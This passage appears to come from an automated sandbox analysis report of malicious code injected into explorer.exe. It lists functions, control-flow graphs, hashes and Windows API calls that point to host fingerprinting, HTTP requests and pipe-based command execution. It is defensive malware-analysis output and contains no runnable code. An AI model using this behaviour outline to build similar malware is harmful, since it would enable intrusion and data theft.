                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                                                            • String ID: o
                                                                                                                                                                                                                            • API String ID: 2074107575-252678980
                                                                                                                                                                                                                            • Opcode ID: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
                                                                                                                                                                                                                            • Instruction ID: 9aabffb3e629938986ff651f1076437bae3f88982201b6ffaeb179c01593eb57
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EA12076209B84CADB60EB15F48036AB7A4F7C8799F448529EACE93B59DF3CC544CB04
                                                                                                                                                                                                                            Function 089D7274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 162 89d7274-89d72ab GetAdaptersInfo 163 89d72ad-89d72cd call 89db388 GetAdaptersInfo 162->163 164 89d72f8-89d72fe 162->164 171 89d72d1-89d72dd 163->171 166 89d730a 164->166 167 89d7300-89d7305 call 89d82b4 164->167 169 89d730f-89d7313 166->169 167->166 172 89d72df-89d72e1 171->172 173 89d72e3-89d72f6 171->173 172->169 173->164 173->171
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 089D729C
                                                                                                                                                                                                                              • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 089D72C7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                                                            • String ID: o
                                                                                                                                                                                                                            • API String ID: 2718687846-252678980
                                                                                                                                                                                                                            • Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                                                            • Instruction ID: 7564c63e5e0cb46ed33ea28870ca4a3539785e18b4ef01bb532794263141a0d2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B01A276508B44C6DB30EF55E49431EBBA0F3C8799F448629E68D46B28DB7CC6858B08
                                                                                                                                                                                                                            Function 089DA8E0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 179 89da8e0-89da8fb call 89d8cf0 182 89da8fd-89da8ff 179->182 183 89da904-89da918 call 89db4cc 179->183 184 89daa04-89daa0b 182->184 187 89da91a-89da924 183->187 188 89da926-89da92b 183->188 189 89da930-89da941 call 89dbf78 187->189 188->189 192 89da94a-89da983 call 89db470 FindFirstFileW 189->192 193 89da943-89da945 189->193 196 89da9f5-89da9ff call 89d82b4 192->196 197 89da985-89da98a 192->197 193->184 196->184 197->196 198 89da98c-89da9a1 FindNextFileW 197->198 201 89da9a5-89da9ab 198->201 202 89da9a3 198->202 203 89da9ad 201->203 204 89da9af-89da9dc call 89dc144 call 89d7430 201->204 202->196 203->196 209 89da9de-89da9f1 LoadLibraryW 204->209 210 89da9f3 204->210 209->196 210->197
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DirectorySystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2188284642-0
                                                                                                                                                                                                                            • Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                                                            • Instruction ID: 26a8e8a972693e24dd4b81b80cc291e1399f719745f5a16c4426c6dfb017ab55
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3314426118F91D5D720FB24E48436AB3A5F7C4369F418725D6EE42AA8EF3CC155CB08
                                                                                                                                                                                                                            Function 089DB388 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 221 89db388-89db3c6 NtAllocateVirtualMemory 222 89db3c8-89db3d2 call 89db470 221->222 223 89db3d7-89db3e0 221->223 222->223
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 2167126740-2766056989
                                                                                                                                                                                                                            • Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                                                            • Instruction ID: d2b7aa716fd9b7d3ac4b5f27ef490052893607bda582cf508d8192ec5f318b3d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FE0A5A6228B84C2D650AF65E45470AB760F7847B8F805305BAA906BD8CBBCC108CB44
                                                                                                                                                                                                                            Function 089D5078 Relevance: 1.6, APIs: 1, Instructions: 57filenetworkCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 243 89d5078-89d50ba 244 89d50bc-89d50dc InternetReadFile 243->244 245 89d514f 244->245 246 89d50de-89d50e3 244->246 247 89d5154-89d515c 245->247 246->245 248 89d50e5-89d5102 call 89db704 246->248 251 89d5108-89d514a call 89db3e4 248->251 252 89d5104-89d5106 248->252 251->244 252->247
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                            • Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                                                            • Instruction ID: 8612606d83b53d1f7856e2f3e6daaf46658a2a088378e40e7a5f6668c76ce10f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE2129323296849BCB60DB15E4507AAB3E1F3CCB88F405125EA8E83B58EB7DC604CF04
                                                                                                                                                                                                                            Function 089D82B4 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 296 89d82b4-89d82cc 297 89d82ef-89d82f3 296->297 298 89d82ce-89d82eb NtFreeVirtualMemory 296->298 298->297
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeMemoryVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3963845541-0
                                                                                                                                                                                                                            • Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                                                            • Instruction ID: 129439ff6f5331b36cbbf9e19a2c52b8b5af7f9d0fae5cf260bd693573fe828f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BE0EC72608B81C2D721AB60E4443897B70F3853B8F944315EBF816AE8CF7CC289CB04
                                                                                                                                                                                                                            Function 089DC704 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 299 89dc704-89dc730 NtDelayExecution
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DelayExecution
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1249177460-0
                                                                                                                                                                                                                            • Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                                                            • Instruction ID: ff59ad23744dfe15dd31d04520d7a9541a3e78019c419da363f45638515d4da9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25D0C772704680C7CB149B14E44521E7760F795344FD0451DE6CD45754DE3CC265CF04
                                                                                                                                                                                                                            Function 089D41B4 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                                                                                            • Instruction ID: f461dc760e6032abfa047e5b115f697ff7d862c9227c0ef130ab1e331e0f7dce
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4315236214B41C2D750FBB9E98432A7654FBC43AAF44D729E9AA467E4DF78C005CB4C
                                                                                                                                                                                                                            Function 089D5160 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 107 89d5160-89d51c7 call 89db388 call 89db4cc 112 89d51c9-89d51d6 107->112 113 89d51d8-89d51e0 107->113 114 89d51e5-89d520d call 89dbe64 112->114 113->114 117 89d520f-89d5226 call 89db4cc 114->117 118 89d5265-89d5275 114->118 126 89d5228-89d5235 117->126 127 89d5237-89d523f 117->127 120 89d5284-89d528c 118->120 121 89d5277-89d5280 118->121 123 89d5315-89d532c call 89db4cc 120->123 124 89d5292-89d52a9 call 89db4cc 120->124 121->120 134 89d532e-89d533e 123->134 135 89d5340-89d5348 123->135 132 89d52ab-89d52b8 124->132 133 89d52ba-89d52c2 124->133 130 89d5244-89d525b call 89dbe64 126->130 127->130 130->118 141 89d5260 call 89dbe64 130->141 137 89d52c7-89d5310 HttpOpenRequestA 132->137 133->137 138 89d5350-89d5397 HttpOpenRequestA 134->138 135->138 140 89d539c-89d53a2 137->140 138->140 142 89d53a9-89d53b1 140->142 143 89d53a4 140->143 141->118 144 89d53d6-89d53de 142->144 145 89d53b3-89d53d0 InternetSetOptionA 142->145 146 89d5467-89d546d 143->146 147 89d5424-89d543f HttpSendRequestA 144->147 148 89d53e0-89d5422 call 89dc0fc * 2 HttpSendRequestA 144->148 145->144 149 89d546f-89d5474 call 89d82b4 146->149 150 89d5479 146->150 152 89d5443-89d5448 147->152 148->152 149->150 154 89d547b-89d5482 150->154 156 89d544c-89d545b call 89d82b4 152->156 157 89d544a 152->157 156->146 156->154 157->146
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET ref: 089D5305
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET ref: 089D5391
                                                                                                                                                                                                                            • InternetSetOptionA.WININET ref: 089D53D0
                                                                                                                                                                                                                            • HttpSendRequestA.WININET ref: 089D5418
                                                                                                                                                                                                                            • HttpSendRequestA.WININET ref: 089D5439
                                                                                                                                                                                                                              • Part of subcall function 089D82B4: NtFreeVirtualMemory.NTDLL ref: 089D82E5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2140924187-0
                                                                                                                                                                                                                            • Opcode ID: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                                                                                            • Instruction ID: 8ac197cf7feec88780a376b64662abd7c60a07c38840bb43677085c0e27b53ad
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8771D236209B84C6DB60EB14F48039AB7A4F3C8795F54852AEAC943B68DF7CC588CF44
                                                                                                                                                                                                                            Function 089D8D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 174 89d8d3c-89d8d6c call 89db470 GetUserNameA 177 89d8d6e-89d8d81 wsprintfA 174->177 178 89d8d87-89d8d95 174->178 177->178
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameUserwsprintf
                                                                                                                                                                                                                            • String ID: tina
                                                                                                                                                                                                                            • API String ID: 54179028-1137971103
                                                                                                                                                                                                                            • Opcode ID: 74120f94081957b39dcb7d11c364901f8914ee27a4b2dd0b4ec9089b68c6a037
                                                                                                                                                                                                                            • Instruction ID: e93e2e1242f8a7b3b2cb529f13814e402a00a8d155c816deb7fd3022410d7659
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74120f94081957b39dcb7d11c364901f8914ee27a4b2dd0b4ec9089b68c6a037
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFF0E571224B8792EB50FF14E8413B96721F790748FC49026A18E42999EF7CC30AC744
                                                                                                                                                                                                                            Function 089D8C30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 211 89d8c30-89d8c7b call 89db470 * 2 FindFirstVolumeW 216 89d8c7d-89d8c7f 211->216 217 89d8c81-89d8cd8 GetVolumeInformationW FindVolumeClose 211->217 218 89d8ce5-89d8cec 216->218 219 89d8cda-89d8ce1 217->219 220 89d8ce3 217->220 219->218 220->218
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstVolumeW.KERNEL32 ref: 089D8C6A
                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32 ref: 089D8CBE
                                                                                                                                                                                                                            • FindVolumeClose.KERNEL32 ref: 089D8CCD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 586543143-0
                                                                                                                                                                                                                            • Opcode ID: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                                                                                            • Instruction ID: ee29048adf7387c415b36dc8f5993556e97cfbab137ad793c9e260e4872448d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A110D76118B40C6D760EB20F48439B77B1F385361F944626E2DA42BA8DF7CC54ACB44
                                                                                                                                                                                                                            Function 089D8A58 Relevance: 1.6, APIs: 1, Instructions: 94libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 225 89d8a58-89d8a70 226 89d8a79-89d8acc 225->226 227 89d8a72-89d8a74 225->227 229 89d8ad8-89d8ae4 226->229 228 89d8bd4-89d8bd8 227->228 230 89d8aea-89d8b41 call 89dc0fc call 89d7430 229->230 231 89d8bd2 229->231 236 89d8bcd 230->236 237 89d8b47-89d8b4d 230->237 231->228 236->229 237->236 239 89d8b4f-89d8b57 237->239 239->236 240 89d8b59-89d8b61 239->240 241 89d8b75-89d8bcb 240->241 242 89d8b63-89d8b73 GetProcAddress GetProcAddressForCaller 240->242 241->228 242->241
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 190572456-0
                                                                                                                                                                                                                            • Opcode ID: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                                                                                            • Instruction ID: 2d9774201ee8c0d6df8f41f3a3fae0a083083542727f83722ab0854d677cc808
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A941A576619B848BCB60DB19E49072AB7A4F3C8B85F504526EB8E83B29DB3CC551CF04
                                                                                                                                                                                                                            Function 089D545D Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 255 89d545d-89d5461 256 89d5265-89d5275 255->256 257 89d5467-89d546d 255->257 260 89d5284-89d528c 256->260 261 89d5277-89d5280 256->261 258 89d546f-89d5474 call 89d82b4 257->258 259 89d5479 257->259 258->259 263 89d547b-89d5482 259->263 264 89d5315-89d532c call 89db4cc 260->264 265 89d5292-89d52a9 call 89db4cc 260->265 261->260 272 89d532e-89d533e 264->272 273 89d5340-89d5348 264->273 270 89d52ab-89d52b8 265->270 271 89d52ba-89d52c2 265->271 274 89d52c7-89d5310 HttpOpenRequestA 270->274 271->274 275 89d5350-89d5397 HttpOpenRequestA 272->275 273->275 276 89d539c-89d53a2 274->276 275->276 277 89d53a9-89d53b1 276->277 278 89d53a4 276->278 279 89d53d6-89d53de 277->279 280 89d53b3-89d53d0 InternetSetOptionA 277->280 278->257 281 89d5424-89d543f HttpSendRequestA 279->281 282 89d53e0-89d5422 call 89dc0fc * 2 HttpSendRequestA 279->282 280->279 284 89d5443-89d5448 281->284 282->284 286 89d544c-89d545b call 89d82b4 284->286 287 89d544a 284->287 286->257 286->263 287->257
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1984915467-0
                                                                                                                                                                                                                            • Opcode ID: b63ba8eaa06b2abc429e5557986bc836de0240013f192fa4620f15fbf5b13976
                                                                                                                                                                                                                            • Instruction ID: d403d956b74d573aa2f999b76f128ae0884a504e41aa48f1fa9bc500fa6168ca
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b63ba8eaa06b2abc429e5557986bc836de0240013f192fa4620f15fbf5b13976
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D110D32109B80C6EB61EB54F48479AB7A4F388399F554529DBC982A69DF7DC084CF05
                                                                                                                                                                                                                            Function 089D6C6C Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 292 89d6c6c-89d6ca1 CreateThread 293 89d6caa 292->293 294 89d6ca3-89d6ca8 292->294 295 89d6cac-89d6cb0 293->295 294->295
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                            • Opcode ID: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                                                                                            • Instruction ID: 1a686712c6436056e974001ae4c1e0ab34eed5b9fd80ce6ce6cbc186b2db3d2f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89E04F72624B8085D764EB20F88435A7BA0F3D4394F849415E68B46B28CF3CC186CB04

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 089D2164 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreatePipe.KERNEL32 ref: 089D2233
                                                                                                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 089D224D
                                                                                                                                                                                                                            • CreatePipe.KERNEL32 ref: 089D226E
                                                                                                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 089D2288
                                                                                                                                                                                                                            • CreatePipe.KERNEL32 ref: 089D22A9
                                                                                                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 089D22C3
                                                                                                                                                                                                                            • CreateProcessW.KERNEL32 ref: 089D2385
                                                                                                                                                                                                                              • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 089D2434
                                                                                                                                                                                                                            • ReadFile.KERNEL32 ref: 089D2490
                                                                                                                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 089D24E4
                                                                                                                                                                                                                            • ReadFile.KERNEL32 ref: 089D2540
                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 089D2579
                                                                                                                                                                                                                            • TerminateProcess.KERNEL32 ref: 089D25AA
                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 089D25B8
                                                                                                                                                                                                                              • Part of subcall function 089DC704: NtDelayExecution.NTDLL ref: 089DC726
                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 089D25C6
                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 089D25D4
                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 089D25E2
                                                                                                                                                                                                                              • Part of subcall function 089D82B4: NtFreeVirtualMemory.NTDLL ref: 089D82E5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                                                                                                            • String ID: h
                                                                                                                                                                                                                            • API String ID: 30365702-2439710439
                                                                                                                                                                                                                            • Opcode ID: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                                                                                                            • Instruction ID: dbcceea26f7e0392d8c52101e6cd038a186b6620f9046202cbdac3dd924f5748
